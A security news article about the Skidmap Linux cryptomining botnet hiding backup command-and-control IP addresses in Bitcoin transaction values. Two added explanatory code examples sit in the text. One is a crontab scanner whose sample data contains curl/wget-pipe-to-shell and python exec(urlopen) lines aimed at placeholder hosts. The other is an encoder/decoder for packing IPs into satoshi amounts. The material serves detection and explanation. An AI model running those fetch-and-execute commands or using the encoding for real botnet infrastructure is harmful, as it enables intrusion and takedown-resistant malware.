Vulnerabilities / Threats

2/24/2021
09:15 AM

Botnet Uses Blockchain to Obfuscate Backup Command & Control Information

The tactic makes it much harder for defenders to take down botnets via sinkholing and other standard techniques, Akamai says.

The operator of a known botnet used for cryptocurrency mining has started using a relatively rare technique for maintaining persistence that, if more broadly adopted, could make botnet takedowns much harder to accomplish.

Researchers at Akamai recently observed the technique being used in infection attempts targeting customers of its security intelligence response team. In a new report, the company describes the tactic as involving the use of the Bitcoin blockchain to obfuscate configuration information pertaining to secondary command-and-control (C2) infrastructure for the botnet. The decentralized nature of the blockchain makes the botnet infrastructure more reliable and harder to sinkhole, Akamai says.

"The primary goal is to be able to recover from offensive actions taken against the botnet," says Akamai researcher Evyatar Saias. The operators want to ensure that if domains are seized or IP addresses are null-routed, they have an out-of-band method for communicating information that points infected systems to new C2 servers, he says. "They leverage the blockchain to do that because it is decentralized and won't be taken down," Saias says.

The cryptocurrency-mining botnet malware that Akamai observed using the new technique is associated with a campaign called "Skidmap" that targets Linux machines, which Trend Micro first reported in September 2019. The malware exploits publicly known remote code execution vulnerabilities in technologies such as Hadoop YARN and Elasticsearch.

Once installed on a vulnerable system, the malware uses cron jobs (tasks that the cron daemon runs on a fixed schedule) to check in with its C2 servers and to keep reinfecting the compromised host with the latest version of itself. To stay resilient against takedown attempts, the operators of the botnet, like their peers, have established a mechanism by which infected systems automatically download a new version of the malware configured to use new domains and infrastructure if the primary ones are taken down.
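The cron-driven check-in and reinfection loop described above is something a defender can hunt for in scheduled tasks. The following is an added example, not code from Akamai, Trend Micro or the Skidmap samples: it parses crontab text and flags entries that fetch something from the network and hand it straight to a shell interpreter or an inline `exec()`. The crontab lines are constructed for the example, and the IP addresses in them are documentation ranges, not real botnet infrastructure.

```python
import re

# Constructed crontab for the example. The two benign lines are typical
# maintenance jobs; the other three are the pattern a reinfection loop leaves:
# a frequent schedule plus "download something and run it".
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://198.51.100.20/update.sh | sh
@reboot wget -q -O - http://203.0.113.7/p.sh | bash
30 2 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * python3 -c "import urllib.request;exec(urllib.request.urlopen('http://203.0.113.7/x').read())"
"""

# Something that pulls content off the network ...
FETCHERS = re.compile(r"\b(curl|wget|urllib\.request)\b")
# ... piped into a shell, or executed in-process without touching disk.
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash|zsh)\b")
INLINE_EXEC = re.compile(r"\b(exec|eval)\s*\(")


def parse_crontab(text):
    """Yield (schedule, command) for every non-comment crontab line.

    Handles both the five-field form ("*/10 * * * * cmd") and the
    @-shortcut form ("@reboot cmd"); malformed lines are skipped.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd


def suspicious_entries(text):
    """Return the (schedule, command) pairs that fetch and execute."""
    hits = []
    for sched, cmd in parse_crontab(text):
        fetches = FETCHERS.search(cmd) is not None
        if fetches and (PIPE_TO_SHELL.search(cmd) or INLINE_EXEC.search(cmd)):
            hits.append((sched, cmd))
    return hits


if __name__ == "__main__":
    for sched, cmd in suspicious_entries(SAMPLE_CRONTAB):
        print(f"[{sched}] {cmd}")
```

On a real host the same logic would be run over `/etc/crontab`, `/etc/cron.d/*` and each user's crontab (`crontab -l -u <user>`); the patterns are deliberately narrow, so a miss here is a reason to widen them, not a clean bill of health.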

In December 2020, Akamai researchers observed a new version of the botnet malware that took the persistence mechanism up a notch. The sample carried a Bitcoin wallet address, the URL of a public blockchain-explorer API for fetching that wallet's transaction data, and several cryptic Bash one-liners. Akamai's analysis of the new additions showed that the data fetched from the API was being used to calculate an IP address that the malware can fall back to for persistence and reinfection if the primary C2 infrastructure gets sinkholed.

Hiding in the Blockchain
"They're hiding IP addresses in the values of Bitcoin transactions," Saias says. As an analogy of how the system works, he points to a situation in which an individual might want to obfuscate the phone number at which they want someone else to call them. "Let's say I wanted you to call me, but I wanted to make it hard for others to know which phone number I wanted you to call me at," he says. "We could negotiate a system that says when I want you to call me, I'll wire five small deposits, all under a dollar, into your checking account."

The deposit amounts would map to the phone number to be dialed. For example, if the five deposits were $0.55, $0.51, $0.23, $0.45, and $0.67, respectively, the phone number to be dialed would be 555-123-4567, he says. If that phone number were disconnected, all the other person would need to do to find the new number is look at their checking account after a further set of small deposits is made.
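The analogy above, and the idea of reading IP addresses out of transaction values, can be made concrete. The following is an added example and not Akamai's analysis or the malware's own code: the encoding scheme (two transactions per address, two octets packed into each satoshi value) is an assumption chosen for illustration, not the one the Skidmap sample used, and the transaction history, txids and addresses are constructed (documentation ranges, not real C2 hosts). It shows the bot side (decode the latest pair) and the defender side (with the scheme and the watched address, the whole rotation history is readable from the public ledger).

```python
import ipaddress
from decimal import Decimal


def decode_phone(deposits):
    """Saias's analogy: five sub-dollar deposits, two digits (the cents) each,
    concatenate into the phone number to dial."""
    digits = "".join(f"{int(Decimal(str(d)) * 100):02d}" for d in deposits)
    return f"{digits[:3]}-{digits[3:6]}-{digits[6:]}"


# Hypothetical encoding (an assumption for this example, not the scheme Akamai
# documented): one IPv4 address is spread over two transactions, and each
# transaction's value in satoshis packs two octets as (hi << 8) | lo. Every
# value stays below 65536 sat, dust-sized amounts that do not stand out.
MAX_VALUE_SAT = 0xFFFF


def encode_ipv4(ip):
    """Return the two satoshi values the operator would send for `ip`."""
    b = ipaddress.IPv4Address(ip).packed
    return [(b[0] << 8) | b[1], (b[2] << 8) | b[3]]


def decode_ipv4(values):
    """Inverse of encode_ipv4; rejects anything that cannot be an address."""
    if len(values) != 2 or any(not 0 <= v <= MAX_VALUE_SAT for v in values):
        raise ValueError("expected exactly two values in 0..65535")
    octets = bytes([values[0] >> 8, values[0] & 0xFF,
                    values[1] >> 8, values[1] & 0xFF])
    return str(ipaddress.IPv4Address(octets))


# Constructed transaction history for the watched address, oldest first, as a
# block-explorer API might return it: (txid, value_sat). The txids are
# placeholders and the addresses are documentation ranges, not real C2 hosts.
SAMPLE_HISTORY = [
    ("tx-old-1", 0xC633),   # 198.51 ...
    ("tx-old-2", 0x6414),   # ... 100.20  -> previous fallback 198.51.100.20
    ("tx-new-1", 0xCB00),   # 203.0 ...
    ("tx-new-2", 0x7107),   # ... 113.7   -> current fallback 203.0.113.7
]


def current_fallback(history):
    """What the bot would do: decode the two most recent transactions. Older
    pairs are fallbacks that were rotated out when the operator sent a new
    pair, the 'look at the account again' step in the analogy."""
    latest = [value for _, value in history[-2:]]
    return decode_ipv4(latest)


def fallback_history(history):
    """Defender's view: every fallback address ever published, in order."""
    values = [value for _, value in history]
    return [decode_ipv4(values[i:i + 2]) for i in range(0, len(values) - 1, 2)]


if __name__ == "__main__":
    print(decode_phone([0.55, 0.51, 0.23, 0.45, 0.67]))
    print(current_fallback(SAMPLE_HISTORY))
    print(fallback_history(SAMPLE_HISTORY))
```

Two things follow for defenders. The ledger is public, so once the wallet address and the encoding are recovered from a sample, every backup address the operator has ever published (and every future one) is an indicator you can read as easily as the bot can. And the bot has to reach a block-explorer API to do so; that HTTP request from a server that has no business talking to one is itself a detection opportunity, independent of which C2 address it ultimately decodes.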

The primary difference between the blockchain approach and other approaches is that usually there is a central authority overseeing the storage and dissemination of C2 information. Since blockchains are decentralized by design, they are resistant to centralized attempts to censor or remove data, Saias says. So, while a command-and-control bot on a social media platform, for example, might be easy to shut down, a wallet operating on a blockchain is considerably harder to neutralize.

"You would need to effectively ban the wallet from inquiries on public blockchain explorer platforms — of which there are many," he says. In the time it would take to coordinate such an effort — even if it were possible — that attacker could simply use another wallet address.

According to Saias, though there have been reports of others using a similar tactic, this is the first time that Akamai has directly observed the blockchain being used to obfuscate backup IP address information.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...
